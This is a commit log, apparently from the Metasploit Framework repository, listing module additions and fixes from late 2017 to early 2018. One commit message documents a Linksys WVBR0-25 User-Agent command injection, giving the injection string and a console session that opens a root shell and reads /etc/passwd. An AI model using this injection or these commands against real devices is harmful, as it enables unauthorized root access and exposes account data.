Commit Graph

23500 Commits (b0012d6f360e0dee69d1b32c081fa79df4ebb5a6)

Author SHA1 Message Date
Brendan Coles 5e11d36351 Add ABRT raceabrt Privilege Escalation module 2018-01-16 14:52:33 +00:00
Brendan Coles 4ade798cef Fix check for juju-run path 2018-01-16 07:19:48 +00:00
William Vu e5bd36da1c
Land #9402, NIS bootparamd domain name disclosure 2018-01-15 15:36:00 -06:00
Daniel Teixeira aa9b5e4419
Sync Breeze Enterprise Import Command 2018-01-15 20:46:40 +00:00
Christian Mehlmauer 2f9eebe28b
remove plugin dir 2018-01-15 14:48:59 +01:00
Philippe Tranca dfb9941e95 Fix java_jmx_server exploit
Add test case when discovering RMI endpoint as the previous one was not complete
2018-01-15 12:13:09 +01:00
Nicky Bloor 333ee893d3 Tidied up platform detection, check method, and minor typos. 2018-01-14 18:28:40 +00:00
Brendan Coles e1cbe4e906 Rename apport_chroot_priv_esc to apport_abrt_chroot_priv_esc 2018-01-14 08:33:43 +00:00
Brendan Coles c234d0523a Add support for abrt on Fedora 2018-01-14 08:33:10 +00:00
Brendan Coles c94763bfe0 Add Juju-run Agent Privilege Escalation module 2018-01-14 05:57:17 +00:00
William Vu 736d438813 Address second round of feedback
Brain fart on guard clauses when I've been using them all this time...
Updating the conditions made the ternary fall out of favor.

Changed some wording in the doc to suggest the domain name for a
particular NIS server may be different from the bootparamd client's
configuration.
2018-01-13 22:55:01 -06:00
Nicky Bloor 6568d29b67 Add BMC Server Automation RSCD Agent RCE exploit module. 2018-01-14 01:12:55 +00:00
William Vu 1a8eb7bf2a Update nis_ypserv_map after bootparam feedback
Yes, yes, I see the off-by-one "error." It's more accurate this way.
Basically, we want to ensure there's actually data to dump.
2018-01-13 15:40:17 -06:00
William Vu c080329ee6 Update module after feedback
Looks like I can't decide on certain style preferences.

Not keen on using blank?, but I've used it before. Time to commit?

Also, fail_with has been fixed for aux and post since #8643. Use it!
2018-01-13 15:40:11 -06:00
Brendan Coles 2f3e3b486a Use cross-compiled exploit 2018-01-13 05:44:42 +00:00
Brendan Coles d172259f5d
umlaut 2018-01-13 16:06:11 +11:00
William Vu eb8429cbd3
Revert "umlaut"
This reverts commit ffd7073420.
2018-01-12 22:57:22 -06:00
Brendan Coles ffd7073420
umlaut 2018-01-13 15:48:45 +11:00
Jeffrey Martin 1f1dc59d17
Land #9392, python meterpreter whitespace normalization 2018-01-12 21:24:13 -06:00
William Vu 2916c5ae45 Rescue Rex::Proto::SunRPC::RPCTimeout
Coincidentally, this also fixes the rescue in the library, since
rescuing Timeout instead of Timeout::Error does nothing.
2018-01-12 19:34:59 -06:00
William Vu 0c9f1d71d3 Add NIS bootparamd domain name disclosure 2018-01-12 19:34:53 -06:00
Brendan Coles 842736f7b1 register_dir_for_cleanup 2018-01-12 14:21:43 +00:00
Agahlot 488f27bf76 Small Typo 2018-01-12 07:05:30 -05:00
RageLtMan c65c03722c Migrate native DNS services to Dnsruby data format
Dnsruby provides advanced options like DNSSEC in its data format
and is a current and well supported library.
The infrastructure services - resolver, server, etc, were designed
for a standalone configuration, and carry entirely too much weight
and redundancy to implement for this context. Instead of porting
over their native resolver, update the Net::DNS subclassed Rex
Resolver to use Dnsruby data formats and method calls.
Update the Msf namespace infrastructure mixins and native server
module with new method calls and workarounds for some instance
variables having only readers without writers. Implement the Rex
ServerManager to start and stop the DNS service adding relevant
alias methods to the Rex::Proto::DNS::Server class.

Rex services are designed to be modular and lightweight, as well
as implement the sockets, threads, and other low-level interfaces.
Dnsruby's operations classes implement their own threading and
socket semantics, and do not fit with the modular mixin workflow
used throughout Framework. So while the updated resolver can be
seen as adding rubber to the tire fire, converting to dnsruby's
native classes for resolvers, servers, and caches, would be more
like adding oxy acetylene and heavy metals.

Testing:
  Internal tests for resolution of different record types locally
and over pivot sessions.
2018-01-12 05:00:00 -05:00
Brendan Coles 8bbffd20cd Add Apport chroot Privilege Escalation exploit 2018-01-12 07:25:35 +00:00
Kevin Kirsche 04e4ff6b3c
Use stop_service to avoid cleanup overload 2018-01-11 19:14:26 -05:00
Kevin Kirsche 40f54df129
Feedback updates 2018-01-11 18:54:58 -05:00
Kevin Kirsche 172ffdfea1
Use geturi instead of building it ourselves 2018-01-11 18:27:56 -05:00
Wei Chen e6c4fb1dab
Land #9269, Add a new target for Sync Breeze Enterprise GET BoF
Land #9269
2018-01-11 16:54:23 -06:00
Wei Chen f395e07fc6 Land #9269, add new target for Sync Breeze Enterprise GET BoF
Land #9269
2018-01-11 16:53:02 -06:00
Kevin Kirsche d4056e72da
Lower the default timeout for CHECK 2018-01-11 17:38:30 -05:00
Kevin Kirsche 3617a30e34
Add URIPATH random URI 2018-01-11 17:33:14 -05:00
Kevin Kirsche a28d4a4b5b
Add check and update for some style considerations 2018-01-11 17:28:09 -05:00
Kevin Kirsche 0d9a40d2e5
Use target['Platform'] instead of target_platform 2018-01-11 15:44:07 -05:00
Kevin Kirsche c490d642e2
Was missing a comma 2018-01-11 09:42:24 -05:00
Kevin Kirsche 3132566d8f
Fix OptFloat error 2018-01-11 09:22:16 -05:00
Kevin Kirsche c05b440f26
Fix additional feedback
This
* uses ternary operators
* uses an `RPORT` option shortcut
* removes the `xml_payload` variable and instead more explicitly uses the method directly
* Uses `OptFloat` for the timeout option to allow partial seconds
2018-01-11 08:17:13 -05:00
William Vu 4b225c30fd
Land #9368, ye olde NIS ypserv map dumper 2018-01-10 22:02:36 -06:00
William Vu f66b11f262 Nix an unneeded variable declaration 2018-01-10 20:24:02 -06:00
Wei Chen 6510ee53bc
Land #9204, Add exploit for Samsung SRN-1670D (CVE-2017-16524)
Land #9204
2018-01-10 20:15:29 -06:00
Wei Chen 18c179a091 Update module and add documentation
This updates the module to pass:

* msftidy
* Ruby style guidelines
* Proper usage of Metasploit API
* Mostly other cosmetic fixes

A documentation is also added.
2018-01-10 20:13:42 -06:00
William Vu b66889ac86 Rescue additional errors and refactor code
https://jvns.ca/blog/2015/11/27/why-rubys-timeout-is-dangerous-and-thread-dot-raise-is-terrifying/
2018-01-10 20:11:25 -06:00
Wei Chen 7e2c7837e5
Land #9325, Add CVE-2017-6090 phpCollab 2.5.1 file upload exploit module
Land #9325
2018-01-10 17:39:50 -06:00
Wei Chen b1f3f471f3 Update phpcollab_upload_exec code (also module documentation) 2018-01-10 17:38:52 -06:00
Wei Chen dd737c3bc8
Land #9317, remove multiple deprecated modules
Land #9317

The following modules are replaced by the following:

auxiliary/scanner/discovery/udp_probe
is replaced by:
auxiliary/scanner/discovery/udp_sweep

exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload
is replaced by:
exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload

exploit/windows/misc/regsvr32_applocker_bypass_server
is replaced by:
exploits/multi/script/web_delivery
2018-01-10 15:47:20 -06:00
Tim W 550e9a3d31 fix payload cached size 2018-01-10 15:06:08 +08:00
Wei Chen 8d77f35b16
Land #9373, Add LabF nfsAxe FTP Client 3.7 Stack Buffer Overflow
Land #9373
2018-01-09 22:40:50 -06:00
Wei Chen 25280e3319 Update labf_nfsaxe and module documentation 2018-01-09 22:39:40 -06:00
Tim W cf893c2962 fix LHOST 2018-01-10 11:48:41 +08:00
Tim W e225e29add fix default LHOST 2018-01-10 11:34:51 +08:00
Brent Cook f125e13278
python meterpreter whitespace normalization 2018-01-09 16:08:52 -05:00
Wei Chen 777e383568
Land #9377, Add HPE iMC dbman RestoreDBase Unauthenticated RCE exploit
Land #9377
2018-01-09 13:56:53 -06:00
Wei Chen a0c9cdd73d
Land #9376, Add HPE iMC dbman RestartDB Unauthenticated RCE exploit
Land #9376
2018-01-09 13:28:03 -06:00
Brent Cook 573ee28631
Land #9378, Detect and return on bad VNC negotiations 2018-01-09 03:46:00 -05:00
William Vu 4a5a17a8e1 Add NIS ypserv map dumper 2018-01-08 14:27:53 -06:00
Kevin Kirsche ab89e552ed
Remove accidental trailing space 2018-01-08 14:42:03 -05:00
Kevin Kirsche 2252490e62
Fix using arbitrary keys to instead use "URL" 2018-01-08 14:30:03 -05:00
Kevin Kirsche e80ca348cf
Add Exploit-DB ID 2018-01-08 10:55:46 -05:00
Kevin Kirsche 6beeece708
Re-add timeout value 2018-01-07 20:21:29 -05:00
Wei Chen d138f1508c
Land #9340, Add exploit for Commvault Remote Command Injection
Land #9340
2018-01-07 12:17:26 -06:00
Daniel Teixeira ff1806ef5f
Update labf_nfsaxe.rb 2018-01-07 16:46:06 +00:00
Kevin Kirsche eefd432161
Make sure Platforms match our actual target list 2018-01-06 08:31:30 -05:00
Kevin Kirsche 4bd196f8b2
Fix missing single quotes and remove comma 2018-01-06 08:30:48 -05:00
Kevin Kirsche 867b32415d
Fix feedback from wvu-r7
Fixes feedback from wvu-r7

- Consolidates payload to single method
- Replaces gsub! with standard encode method
- Note exploit discovery and proof of concept code used in authors (still seems weird to include the discovery as an author...)
- Change link
- Use `ARCH_CMD` instead of `[ARCH_CMD]`
- Remove Linux target as it's only Windows or Unix
- Remove timeout as I don't know how to pass it to `send_request_cgi`
2018-01-06 08:12:43 -05:00
Kevin Kirsche 744f20304c
Remove hardcoded user-agent from the headers
Remove hardcoded user-agent from the headers allowing for `send_request_cgi` to control this
2018-01-05 18:22:27 -05:00
Daniel Teixeira a69f275a39
Update labf_nfsaxe.rb 2018-01-05 21:14:47 +00:00
Daniel Teixeira c819aebc76
Add files via upload 2018-01-05 21:11:21 +00:00
Daniel Teixeira e797ca4781
Add files via upload 2018-01-05 21:00:47 +00:00
Daniel Teixeira aca76e2a4e
Update labf_nfsaxe.rb 2018-01-05 20:58:36 +00:00
Daniel Teixeira 2643acbc25
Update labf_nfsaxe.rb 2018-01-05 20:55:49 +00:00
Daniel Teixeira b29710c66b
Add files via upload 2018-01-05 20:47:27 +00:00
Daniel Teixeira 94a1198485
Update labf_nfsaxe.rb 2018-01-05 20:41:49 +00:00
Kevin Kirsche 2478de934b
Add CVE-2017-10271 / Oracle WebLogic wls-wsat RCE 2018-01-05 15:05:21 -05:00
Daniel Teixeira b97785c7a9
Update labf_nfsaxe.rb 2018-01-05 18:46:33 +00:00
Daniel Teixeira e7946549d7
Update labf_nfsaxe.rb 2018-01-05 18:31:40 +00:00
jgor 51e5fb450f Detect and return on bad VNC negotiations 2018-01-05 10:12:13 -06:00
Brendan Coles 006514864b Add HPE iMC dbman RestoreDBase Unauthenticated RCE exploit 2018-01-05 11:28:48 +00:00
Brendan Coles 52a5fc9e0a Add HPE iMC dbman RestartDB Unauthenticated RCE exploit 2018-01-05 11:28:14 +00:00
Daniel Teixeira a3fb8b6619
Update labf_nfsaxe.rb 2018-01-04 20:55:38 +00:00
Daniel Teixeira e5bb4bf057
Add files via upload 2018-01-04 20:26:28 +00:00
Tim W beda2d1efb add retries and error checking to osx stager 2018-01-05 03:59:12 +08:00
h00die fb75cd4617 it does work! 2018-01-04 14:44:43 -05:00
h00die 65f444ddcc
land #9362 exploit for pfsense graph injection 2018-01-04 14:35:52 -05:00
wetw0rk c9d6d0a7a7 -51 2018-01-04 12:25:31 -06:00
William Vu 366a20a4a4
Fix #9215, minor style nitpick 2018-01-03 23:11:51 -06:00
Brent Cook 520e890520
Land #8581, VMware Workstation ALSA Config File Local Privilege Escalation 2018-01-03 21:35:57 -06:00
Wei Chen b8dde2e650 Land #9360, Ayukov NFTP FTP client buffer overflow vulnerability
Land #9360
2018-01-03 20:56:12 -06:00
Wei Chen 04cf3017c0 Update ayukov_nftp exploit and module documentation 2018-01-03 20:52:57 -06:00
Aaron Soto 7849155347
Land #9359, Improve DCE/RPC fault handling 2018-01-03 20:42:17 -06:00
William Vu c3f10c1d57
Land #9336, Linksys WVBR0-25 exploit 2018-01-03 18:13:44 -06:00
dmohanty-r7 a5fa63405f
Land #9206, Add Xplico RCE exploit module 2018-01-03 16:02:51 -06:00
Adam Cammack a98de2d9a3
Land #9358, Support password protected key files 2018-01-03 15:12:28 -06:00
William Vu a1d43c8f33
Land #9215, new Drupageddon vector 2018-01-03 14:45:32 -06:00
William Vu 84c951cc1d
Land #8059, Postfixadmin alias modification module 2018-01-03 14:29:49 -06:00
wetw0rk 16d709f180 changes+filedropper 2018-01-03 14:09:30 -06:00
Tim W 46a45550fd add osx x64 stager 2018-01-03 14:04:14 +08:00
h00die e23e87b444 bcoles fixes 2018-01-02 20:23:24 -05:00
wetw0rk 8f0e41e159 requested changes 2018-01-01 17:30:43 -06:00
wetw0rk c47d09717d pfsense graph sploit 2018-01-01 03:18:51 -06:00
Daniel Teixeira 67357e316b
Update ayukov_nftp.rb 2017-12-31 17:48:23 +00:00
Daniel Teixeira 10b2833e7c
Update ayukov_nftp.rb 2017-12-31 17:00:17 +00:00
Daniel Teixeira 21717ae0a2
Create ayukov_nftp.rb 2017-12-31 15:43:16 +00:00
bka-dev 086f657c56
Fix early termination of auxiliary/scanner/dcerpc/hidden
This commit fixes an issue, where auxiliary/scanner/dcerpc/hidden terminates directly, once an endpoint can't be reached or access is denied. Instead the next endpoint in list should be checked, instead of terminating directly.
2017-12-31 14:41:33 +01:00
RageLtMan f2a8d68a1f Permit encrypted SSH keys for login scanner
Net::SSH::KeyFactory permits loading keys using a passphrase.
The Framework SSH modules were implemented back when we had a fork
of net-ssh in our tree, and can now use functionality provided by
the upstream gem.
Update the ssh key login scanner to add a KEY_PASS datastore
OptString which is then passed to the KeyCollection class and used
in the updated :read_key method which now calls the KeyFactory to
read data and give us the appropriate String representation of the
key in the KeyCollection's cache.
A bit of cleanup performed as well, removing legacy code paths no
longer hit by the module. Shamelessly added self to authors, fair
amount of blood and sweat in the SSH subsystem over the years, hope
nobody objects.

Testing:
  None yet
2017-12-31 02:53:06 -05:00
h00die bc0a08ef5a a few updates per bcoles 2017-12-30 11:23:58 -05:00
Brendan Coles c153788424 Remove sleeps 2017-12-30 15:20:56 +00:00
Jan-Frederik Rieckers 7f3df74134
fixup! Adding Module for Postfixadmin CVE-2017-5930
Add error handling if request fails

Fix a typo in doc, add default value to doc
2017-12-30 13:04:23 +01:00
HD Moore ece5528379 Small tweaks based on @bcoles feedback. Thanks! 2017-12-29 16:17:53 -06:00
h00die 3516305517
land #9191 an exploit against HP LoadRunner magentproc 2017-12-29 16:35:43 -05:00
h00die 4dacc70b9a slight updates to magentproc docs 2017-12-29 16:35:12 -05:00
h00die b698095c49 slight updates to magentproc docs 2017-12-29 16:30:32 -05:00
h00die 67c2119736 oh brother 2017-12-29 14:16:34 -05:00
Jan-Frederik Rieckers 289e887895
Adding Module for Postfixadmin CVE-2017-5930
This exploit allows domain admins to delete protected aliases.
It can be used to redirect aliases like abuse@domain and can aid in
further attacks.
2017-12-29 17:13:59 +01:00
Brent Cook 8de760f1f7
Land #9348, Only use basic auth in couchdb_enum when credentials are provided 2017-12-28 21:24:45 -06:00
Tim W 44fbb171a6 osx stager 2017-12-29 11:13:25 +08:00
HD Moore 68f4d4480e Remove unused DefaultOptions block 2017-12-28 17:07:04 -06:00
Pearce Barry e614e9b732
Land #9268, Update DiskBoss Module (EDB 42395) 2017-12-28 16:39:26 -06:00
HD Moore eb696ee5cf Documentation update 2017-12-28 16:30:04 -06:00
HD Moore ab8886e25c Updated payloads and addition of payload stubs 2017-12-28 16:21:37 -06:00
HD Moore ebe57b9e1d Updated exploit module for GoAhead LD_PRELOAD, mostly fire-and-forget 2017-12-28 16:21:04 -06:00
Brent Cook c2bb144d0f
Land #9302, Implement ARD auth and add remote CVE-2017-13872 (iamroot) module 2017-12-28 14:11:26 -06:00
james fad4ccece9 Only use basic auth in couchdb_enum when credentials are provided 2017-12-27 20:16:01 -06:00
Jon Hart bbed7db13c
Merge branch 'upstream-master' into feature/mqtt-login 2017-12-27 13:08:44 -08:00
Tod Beardsley e6de25d63b
Land #9316 Cambium modules and mixins, tx @juushya
These cover several of the CVEs mentioned in

https://blog.rapid7.com/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/
2017-12-26 12:39:51 -06:00
Tod Beardsley 1bb2bb9d2c Oops, no admin in that path 2017-12-26 12:06:45 -06:00
Tod Beardsley 9af88681a2
Move deprecation out 60 days 2017-12-26 11:56:47 -06:00
juushya 8b0f2214b1 few more updates 2017-12-23 03:04:11 +05:30
juushya 038119d9df Use of get_cookies_parsed, changing dirs, marking deprecated in 2 mods, more 2017-12-23 00:14:27 +05:30
Jon Hart d4bc98c13f
Merge branch 'upstream-master' into feature/mqtt-login 2017-12-22 08:07:40 -08:00
b0yd ec7625af9f Damn spaces... 2017-12-22 10:57:11 -05:00
b0yd 2b33b88fa4 Damn spaces 2017-12-22 10:54:31 -05:00
b0yd e088c95a99 Module Cleanup 2017-12-22 10:51:01 -05:00
Jon Hart b29948412e
Correct permissions, fixing warning 2017-12-22 07:27:11 -08:00
b0yd d657a9dc53 Commvault Remote Command Injection 2017-12-22 10:04:13 -05:00
headlesszeke 3dfb836768 Ranking upgrade and uses agent key instead of manually setting user-agent in headers 2017-12-21 23:10:26 -06:00
headlesszeke b31ac73996 Ensure vulnerability check cannot false positive with the power of runtime randomness 2017-12-21 22:53:46 -06:00
William Vu caae33b417
Land #9170, Linux UDF for mysql_udf_payload 2017-12-21 20:48:24 -06:00
headlesszeke 8c3836cc88 Removed msf/core require statement and extraneous debug message 2017-12-21 19:55:56 -06:00
juushya a86abb0297 Implemented get_cookies_parsed 2017-12-22 05:36:36 +05:30
headlesszeke 2ee42e1433
Adds exploit module for CVE-2017-17411
This module is for exploiting vulnerable Linksys WVBR0-25 wireless video bridges using CVE-2017-17411. The vuln in question involves a command injection due to improper sanitization of the User-Agent header. The module makes an initial GET request to the root of the web server and checks the result for a vulnerable firmware version. If vulnerable, it makes a subsequent GET request with the User-Agent set to `";<payload> #`. This can be verified against WVBR0-25 devices running firmware < 1.0.41.

Example console output:

```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth 
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > info

       Name: Linksys WVBR0-25 User-Agent Command Execution
     Module: exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
   Platform: Unix
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-12-13

Provided by:
  HeadlessZeke

Available targets:
  Id  Name
  --  ----
  0   Automatic

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                     yes       The target address
  RPORT    80               yes       The target port
  SSL      false            no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Payload information:
  Space: 1024

Description:
  The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to 
  connect wireless Genie cable boxes to the Genie DVR, is vulnerable 
  to OS command injection in version < 1.0.41 of the web management 
  portal via the User-Agent header. Authentication is not required to 
  exploit this vulnerability.

References:
  http://cvedetails.com/cve/2017-17411/
  http://www.zerodayinitiative.com/advisories/ZDI-17-973
  https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > show payloads 

Compatible Payloads
===================

   Name                     Disclosure Date  Rank    Description
   ----                     ---------------  ----    -----------
   cmd/unix/bind_netcat                      normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/generic                          normal  Unix Command, Generic Command Execution
   cmd/unix/reverse_netcat                   normal  Unix Command Shell, Reverse TCP (via netcat)

msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat 
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id

uid=0(root) gid=0(root)
^C
Abort session 1? [y/N]  y

[*] 10.0.0.104 - Command shell session 1 closed.  Reason: User exit
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/generic 
payload => cmd/unix/generic
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set cmd cat /etc/passwd
cmd => cat /etc/passwd
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit

[*] 10.0.0.104:80 - Trying to access the device ...
[*] 10.0.0.104:80 - Exploiting...
[+] 10.0.0.104:80 - Command sent successfully
[*] 10.0.0.104:80 - Command output:  root0:0::/:/bin/sh nobody99:99:Nobody:/:/bin/nologin sshd22:22::/var/empty:/sbin/nologin admin1000:1000:Admin User:/tmp/home/admin:/bin/sh quagga1001:1001:Quagga
[*] Exploit completed, but no session was created.
msf exploit(linksys_wvbr0_user_agent_exec_noauth) >
```
2017-12-21 17:44:35 -06:00
Tod Beardsley 5dfb5d581a
Switch get_cookies to get_cookies_parsed
Am I doing it right? See #9333
2017-12-21 09:00:56 -06:00
Jon Hart 962bc71d10
Merge branch 'feature/mqtt' into feature/mqtt-login 2017-12-20 18:58:36 -08:00
Jon Hart 298cb16b1a
Set default USER/PASS files 2017-12-20 18:44:43 -08:00
Jon Hart b9af835d06
Style 2017-12-20 18:05:00 -08:00
Jon Hart d0b3abc14b
Better handling of MQTT endpoints which don't require authentication
Arguably this is working around LoginScanner's inability to provide
blank usernames AND passwords
2017-12-20 18:02:52 -08:00
Brent Cook 24907938bb
bump payloads, various fixes 2017-12-20 16:47:37 -06:00
Jon Hart 495c649c7d
Better printing 2017-12-20 14:40:42 -08:00
Jon Hart ed5f177fcd
syntax 2017-12-20 14:20:08 -08:00
Jon Hart e66ec85677
Set default u/p 2017-12-20 14:18:33 -08:00
Brent Cook 5fe9dba4dd
Land #9296, add iOS meterpreter support 2017-12-20 16:09:41 -06:00
Brent Cook df4f62cde9 bump to mettle 0.3.3 2017-12-20 15:58:17 -06:00
Jeffrey Martin 8cd7185a7f
Land #9313, Add DirectAdmin login_scanner module 2017-12-20 15:23:24 -06:00
Jeffrey Martin 7f8a5d3834
improved credential reporting 2017-12-20 15:09:11 -06:00
Nick Marcoccio 86ce3c8781 Made suggested changes and added documentation 2017-12-20 15:54:16 -05:00
Jon Hart 14c779b945
Fix rubocop warning 2017-12-20 12:44:27 -08:00
Jon Hart c817df0bbc
Add module for bruteforcing authentication on MQTT endpoints 2017-12-20 12:30:21 -08:00
Jon Hart 7e91274796
Add module for connecting to/discovering MQTT endpoints 2017-12-20 12:29:50 -08:00
Brent Cook a8b845fff9
Land #9283, Add node.js ws websocket library DoS module 2017-12-20 14:20:42 -06:00
Brent Cook 210f137b7b Merge branch 'upstream-master' into land-9296- 2017-12-20 12:07:53 -06:00
HD Moore 1619a3fcf1 Pull PPC targets for now 2017-12-20 08:33:53 -06:00
Nick Marcoccio ce457db1e3 fixed spaces at EOL 2017-12-20 09:24:30 -05:00
Nick Marcoccio d6024277fc fixed missing quote 2017-12-20 09:03:32 -05:00
Nick Marcoccio 139afe45a9 Add phpCollab 2.5.1 exploit module 2017-12-20 08:36:58 -05:00
Nick Marcoccio fe15ac3b82 Removed file committed by mistake 2017-12-20 08:27:18 -05:00
Nick Marcoccio fd2a0d3057 Add phpCollab 2.5.1 exploit module 2017-12-20 08:22:01 -05:00
EgiX a4098803b3
Remove OSVDB reference 2017-12-20 13:10:42 +01:00
Brent Cook 9fb445fbf0
Land #9300, Add private data type to auxiliary scanner ftp_login and telnet_login 2017-12-20 00:30:43 -06:00
Brent Cook 6b216f2a20
Land #9290, Fix OverrideLHOST/LPORT with http/s Meterpreter payloads 2017-12-20 00:26:06 -06:00
Tod Beardsley 216d00e39f
Use a random fname destination for /etc/passwd 2017-12-19 17:02:16 -06:00
Tod Beardsley e93282b71d
Drop calls to vprint_* 2017-12-19 16:53:02 -06:00
Tod Beardsley 2dc2ac134e
Don't default verbose 2017-12-19 16:48:41 -06:00
Jon Hart a2c5cc0ffb
Remove old deprecated modules 2017-12-19 07:56:16 -08:00
Jon Hart 7b386ea2c8
Fix msftidy warnings wrt Set-Cookie 2017-12-19 06:58:23 -08:00
Nick Marcoccio acc6951bf3 fixed typo 2017-12-19 08:35:11 -05:00
Tim 358aca9435
apple_ios/aarch64/shell_reverse_tcp 2017-12-19 15:42:21 +08:00
HD Moore 25a3863784 Update WIP for GoAhead LD_PRELOAD 2017-12-18 22:20:13 -06:00
Brent Cook 9f144ce8d4
Land #9151, mettle extension support + sniffer module 2017-12-18 21:49:40 -06:00
Tod Beardsley f0df1750de
Land #9180
Land @RootUp's Samsung browser SOP module
2017-12-18 17:28:03 -06:00
Tod Beardsley 85350a9645
Add Rapid7 blog references 2017-12-18 17:11:47 -06:00
Tod Beardsley ae4edd65e1
Hard wrap descriptions 2017-12-18 17:03:13 -06:00
Tod Beardsley 27a324237b
Initial commit for Cambium issues from @juushya
Note, these will trigger a bunch of WARNING msftidy messages for setting
cookies directly. This is on purpose.
2017-12-18 16:32:55 -06:00
Jon Hart a33ed82a40
Land #9214, @realoriginal's update to the Cisco SMI scanner to also fetch Cisco IOS configs 2017-12-18 12:22:26 -08:00
HD Moore a44010deb1 WIP for GoAhead LD_PRELOAD 2017-12-18 10:51:47 -06:00
Brent Cook 2a94a4417a bump payloads 2017-12-18 10:01:10 -06:00
Nick Marcoccio 6d565b6c33 added author information 2017-12-18 09:18:36 -05:00
William Vu e9b9c80841
Fix #9307, credit to @r0610205 2017-12-18 03:55:01 -06:00
William Vu 76823e9fe6
Land #9183, Jenkins Groovy XStream RCE 2017-12-18 03:38:27 -06:00
William Vu d3638d0487
Land #9154, Tuleap PHP object injection exploit 2017-12-18 03:19:42 -06:00
William Vu 0e2a158abd Fix global var $is_check (make ivar @is_check) 2017-12-18 03:15:33 -06:00
Nick Marcoccio f447fa1a12 Added DirectAdmin Login Utillity 2017-12-17 22:43:37 -05:00
Pearce Barry 880a1d4283
Land #9312, Module acting as a Pyrotechnical Device Deployment Tool (PDT) for Hardware Bridge 2017-12-17 18:32:28 -06:00
Pearce Barry 8344401484
Add docs, minor tweaks. 2017-12-17 18:15:49 -06:00
RootUp 917dd8e846
Update samsung_browser_sop_bypass.rb 2017-12-16 22:10:02 +05:30
RootUp 8f91377acb
Update samsung_browser_sop_bypass.rb 2017-12-16 22:09:21 +05:30
Tod Beardsley 3b3b0e6e96
And this is why I hate using single quotes
Also, restored the store_cred call.

This will fix up RootUp/metasploit-framework#3 for PR #9180
2017-12-14 14:28:25 -06:00
jgor 0b3a5567a4 Add module for CVE-2017-13872 iamroot remote exploit via ARD (VNC) 2017-12-14 13:59:35 -06:00
Pearce Barry 048b39ccd6
Initial commit of pdt module. 2017-12-14 09:23:21 -06:00
nromsdahl 384b250659
Add credential data type
Added credential data type so that successful passwords are stored in the database and accessible via the creds command.
2017-12-14 08:07:59 -06:00
nromsdahl be4939b56a
Add credential data type
Added credential data type so a successful ftp login stores the password in the database to be accessed later by the creds command.
2017-12-14 08:05:57 -06:00
William Vu 3cd287ddd6 Update the MS17-010 scanner to use dcerpc_getarch 2017-12-14 02:08:30 -06:00